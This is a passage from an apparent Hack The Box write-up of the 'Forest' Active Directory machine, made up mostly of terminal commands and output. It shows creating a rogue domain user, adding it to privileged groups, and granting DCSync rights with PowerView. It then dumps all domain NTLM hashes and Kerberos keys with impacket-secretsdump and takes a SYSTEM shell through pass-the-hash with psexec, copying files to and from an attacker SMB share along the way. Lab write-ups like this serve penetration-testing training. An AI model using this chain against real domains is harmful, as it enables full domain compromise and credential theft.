0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-03-27T05:16:38.8781460-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-27T05:16:40.0500234-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-03-27T05:16:40.3000250-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-03-27T05:16:40.3000250-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-03-27T05:17:10.7534462-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 42 MB RAM
2022-03-27T05:17:24.6751174-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2022-03-27T05:17:24.7064451-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2022-03-27T05:17:24.8939084-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 46 MB RAM
2022-03-27T05:17:24.8939084-07:00|INFORMATION|Enumeration finished in 00:00:44.8591855
2022-03-27T05:17:25.0033515-07:00|INFORMATION|SharpHound Enumeration Completed at 5:17 AM on 3/27/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco> ls
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
-a---- 3/27/2022 5:17 AM 17775 20220327051724_BloodHound.zip
-a---- 3/27/2022 5:17 AM 19811 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 3/27/2022 1:18 AM 563259 PowerUp.ps1
-a---- 3/27/2022 3:51 AM 906752 SharpHound.exe
Lets copy the ingestors output to our local machine,
*Evil-WinRM* PS C:\Users\svc-alfresco> copy 20220327051724_BloodHound.zip \\10.10.14.4\MONISH\
Now analysing the BloodHound output,
These are the components showed on the home page, lets find out the Domain Admins,
Lets analyse the shortest path from our owned principal to the Administrator of this domain,
But, even though if we PS-Remote to the machine, we could not dump hashes using mimikatz of some compatibility issue
Here Service Accounts is a member of Privileged IT Accounts
And Privileged IT Accounts is also a member of Remote Management Users and Account Operators
Using Remote Management Users we could add users to enable PS-Remoting
And we also have access over Account Operators
If you see in this graph, from the shortest path to Domain Admins can also be done by WriteDacl ACL of Exchange Windows Permission
And we also have GenericAll ACL for Exchange Windows Permission from Account Operators
Privilege Escalation
We are already a member of the required groups,
*Evil-WinRM* PS C:\Users\svc-alfresco> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\Users\svc-alfresco>
Since we are already a member of the required groups, we need to just make use of the GenericAll to add a new user to Exchange Windows Permission,
Creating a new user in the domain
*Evil-WinRM* PS C:\Users\svc-alfresco> net users /domain
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco> net user aidenpearce369 C@ntH4ckM3 /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net users /domain
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator aidenpearce369
andy DefaultAccount Guest
HealthMailbox0659cc1 HealthMailbox670628e HealthMailbox6ded678
HealthMailbox7108a4e HealthMailbox83d6781 HealthMailbox968e74d
HealthMailboxb01ac64 HealthMailboxc0a90c9 HealthMailboxc3d7722
HealthMailboxfc9daad HealthMailboxfd87238 krbtgt
lucinda mark santi
sebastien SM_1b41c9286325456bb SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb SM_681f53d4942840e18 SM_75a538d3025e4db9a
SM_7c96b981967141ebb SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco>
Now using the GenericAll we are adding a new user to the group,
Adding our new user into the target group,
*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions"
Group name Exchange Windows Permissions
Comment This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.
Members
-------------------------------------------------------------------------------
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions" /add aidenpearce369
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions"
Group name Exchange Windows Permissions
Comment This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.
Members
-------------------------------------------------------------------------------
aidenpearce369
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco>
Adding our new user to Remote Management Users enable PS-Remoting access,
*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
Privileged IT Accounts
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users" /add aidenpearce369
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
aidenpearce369
Privileged IT Accounts
The command completed successfully.
Switching to our new user,
┌──(kali㉿aidenpearce369)-[~/SMBShare]
└─$ evil-winrm -u aidenpearce369 -p C@ntH4ckM3 -i 10.10.10.161
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> whoami
htb\aidenpearce369
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> hostname
FOREST
Lets use the WriteDACL ACL to give access to DCSync rights to our new user,
Crafting the credential object for our new user,
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> cd ..
*Evil-WinRM* PS C:\Users\aidenpearce369> $pass = convertto-securestring 'C@ntH4ckM3' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\aidenpearce369> $cred = New-Object System.Management.Automation.PSCredential ('HTB\aidenpearce369', $pass)
We need PowerView to write the DCSync ACL,
*Evil-WinRM* PS C:\Users\aidenpearce369> copy \\10.10.14.4\MONISH\PowerView.ps1 .
*Evil-WinRM* PS C:\Users\aidenpearce369> ls
Directory: C:\Users\aidenpearce369
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/16/2016 6:18 AM Desktop
d-r--- 3/27/2022 8:05 AM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
-a---- 3/27/2022 5:33 AM 770279 PowerView.ps1
*Evil-WinRM* PS C:\Users\aidenpearce369> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\aidenpearce369> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity aidenpearce369 -Rights DCSync
DCSync Privilege is added to our new user, we can easily dump all hashes using DCSync Attack
We can do that using impacket-secretsdump remotely or by using mimikatz locally on target machine
Now lets dump the secrets using the DCSync permission of our new user,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-secretsdump aidenpearce369:C@ntH4ckM3@10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
aidenpearce369:9602:aad3b435b51404eeaad3b435b51404ee:0cb69e78807bb0bce38103060a3e4628:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:f6bec6f0744f874b2347f59f9267b449:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
aidenpearce369:aes256-cts-hmac-sha1-96:f7eafd55f28a0041db1cec4dfa3c620749c4ebf92a5da4edc49ada8a89b9fed1
aidenpearce369:aes128-cts-hmac-sha1-96:161f1c6ca692ea2a4e06779933a50770
aidenpearce369:des-cbc-md5:07fd8615a7c498b0
FOREST$:aes256-cts-hmac-sha1-96:9314a457b8b3f34e9b5ec2ffc39329c3ff00dd3514a1ed5c6cdf445882946517
FOREST$:aes128-cts-hmac-sha1-96:55394fdffa1beff12e98abe8ccec8e3d
FOREST$:des-cbc-md5:758ac8c20e5e43f7
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
Now we have the NTLM hash of Administrator
Lateral Movement
Lets use the NTLM hash of the Administrator to perform Pass The Hash attack
Using psexec for PTH attack,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-psexec htb.local/Administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file GxOgHmkQ.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service MMTl on 10.10.10.161.....
[*] Starting service MMTl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
FOREST
C:\Windows\system32> cd ../../
C:\> cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop> more root.txt
<ROOT FLAG>
C:\Users\Administrator\Desktop>
We can also use wmiexec and many other tools along with the NTLM hash of the Administrator
After dumping all hashes, it would be a full domain takeover